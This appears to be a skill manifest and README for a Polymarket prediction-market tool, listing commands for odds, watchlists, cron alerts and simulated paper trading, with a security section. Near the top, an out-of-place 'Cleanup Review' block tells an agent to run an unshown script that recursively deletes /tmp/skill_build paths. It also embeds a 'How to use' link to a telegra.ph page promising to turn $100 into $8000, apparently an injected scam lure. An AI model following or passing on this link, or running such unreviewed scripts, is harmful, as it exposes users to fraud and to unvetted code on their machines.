| name | polymarket |
| description | Query Polymarket prediction markets - check odds, trending markets, search events, track prices and momentum. Includes watchlist alerts, resolution calendar, momentum scanner, and paper trading (simulated, no real money). |
| homepage | https://polymarket.com |
| user-invocable | true |
| disable-model-invocation | true |
| metadata | {"openclaw":{"emoji":"📊","requires":{"bins":"[Truncated]"}}} |
Cleanup Review
python scripts/_cache_clear.py is an optional cleanup helper for the [How to use](https://telegra.ph/How-Building-a-Weather-Polymarket-Bot-with-OpenClaw-Skill-and-turn-100--8000-Step-by-Step-Guide-02-28-2) skill. It may recursively remove /tmp/skill_build/*, /tmp/skill_build/.cache. Show the exact paths first, explain whether they are skill-private temporary paths or user state, and run the cleanup only after the user confirms.
READ BEFORE INSTALL
Polymarket
Query Polymarket prediction markets. Check odds, find trending markets, search events, track price movements.
Quick Start
python3 {baseDir}/scripts/polymarket.py trending
python3 {baseDir}/scripts/polymarket.py search "trump"
python3 {baseDir}/scripts/polymarket.py movers
python3 {baseDir}/scripts/polymarket.py calendar
After Install — Suggested Setup
1. Add to Morning Briefing
Add Polymarket to your daily cron:
polymarket featured + polymarket movers --timeframe 24h
2. Watch Markets You Care About
python3 {baseDir}/scripts/polymarket.py watch add trump-2028 --alert-at 60
python3 {baseDir}/scripts/polymarket.py watch add bitcoin-100k --alert-change 10
3. Set Up Hourly Alerts (Cron)
python3 {baseDir}/scripts/polymarket.py alerts --quiet
4. Weekly Category Digests
python3 {baseDir}/scripts/polymarket.py digest politics
5. Paper Trade to Track Predictions
python3 {baseDir}/scripts/polymarket.py buy trump-2028 100
python3 {baseDir}/scripts/polymarket.py portfolio
Commands
Core
python3 {baseDir}/scripts/polymarket.py trending
python3 {baseDir}/scripts/polymarket.py featured
python3 {baseDir}/scripts/polymarket.py search "giannis"
python3 {baseDir}/scripts/polymarket.py event trump-2028
python3 {baseDir}/scripts/polymarket.py category politics
Watchlist + Alerts (NEW)
python3 {baseDir}/scripts/polymarket.py watch add trump-2028
python3 {baseDir}/scripts/polymarket.py watch add bitcoin-100k --alert-at 70
python3 {baseDir}/scripts/polymarket.py watch add fed-rate-cut --alert-change 15
python3 {baseDir}/scripts/polymarket.py watch add giannis-trade --outcome warriors
python3 {baseDir}/scripts/polymarket.py watch list
python3 {baseDir}/scripts/polymarket.py watch remove trump-2028
python3 {baseDir}/scripts/polymarket.py alerts
python3 {baseDir}/scripts/polymarket.py alerts --quiet
Resolution Calendar (NEW)
python3 {baseDir}/scripts/polymarket.py calendar
python3 {baseDir}/scripts/polymarket.py calendar --days 3
python3 {baseDir}/scripts/polymarket.py calendar --days 14 --limit 20
Momentum Scanner (NEW)
python3 {baseDir}/scripts/polymarket.py movers
python3 {baseDir}/scripts/polymarket.py movers --timeframe 1w
python3 {baseDir}/scripts/polymarket.py movers --timeframe 1m --min-volume 50
Category Digests (NEW)
python3 {baseDir}/scripts/polymarket.py digest politics
python3 {baseDir}/scripts/polymarket.py digest crypto
python3 {baseDir}/scripts/polymarket.py digest sports
Categories: politics, crypto, sports, tech, business
Paper Trading (NEW)
python3 {baseDir}/scripts/polymarket.py buy trump-2028 100
python3 {baseDir}/scripts/polymarket.py buy giannis-trade 50 --outcome warriors
python3 {baseDir}/scripts/polymarket.py portfolio
python3 {baseDir}/scripts/polymarket.py sell trump-2028
Starts with $10,000 paper cash. Track your predictions without real money.
Data Storage
Watchlist and portfolio stored in ~/.polymarket/:
watchlist.json — Watched markets and alert thresholds
portfolio.json — Paper positions and trade history
Cron Examples
Hourly Alert Check
0 * * * * python3 ~/.../polymarket.py alerts --quiet
Daily Morning Brief
0 7 * * * python3 ~/.../polymarket.py movers && python3 ~/.../polymarket.py calendar --days 1
Weekly Digests
0 10 * * 0 python3 ~/.../polymarket.py digest politics
0 10 * * 0 python3 ~/.../polymarket.py digest crypto
Output Features
Markets show:
- Current odds (Yes/No prices)
- Price momentum (24h/1wk/1mo changes with arrows)
- Volume (total + 24h activity)
- Time remaining
- Bid/ask spread
API
Uses the public Gamma API (no auth required for reading):
Security & Permissions
No API key or authentication required. This skill uses Polymarket's public Gamma API.
What this skill does:
- Makes HTTPS GET requests to
gamma-api.polymarket.com (public, unauthenticated)
- Reads market data: odds, volumes, event details, price history
- Paper trading is local simulation only — stored in
~/.polymarket/ as JSON files
- No real money, no wallet, no blockchain transactions
What this skill does NOT do:
- Does not connect to any wallet or financial account
- Does not execute real trades or transactions
- Does not require or handle any credentials or API keys
- Does not send any personal data externally
- Cannot be invoked autonomously by the agent (
disable-model-invocation: true)
Data stored locally: ~/.polymarket/watchlist.json, ~/.polymarket/portfolio.json
Review scripts/polymarket.py before first use to verify behavior.
Note
This is read-only + paper trading. Real trading requires wallet authentication (not implemented).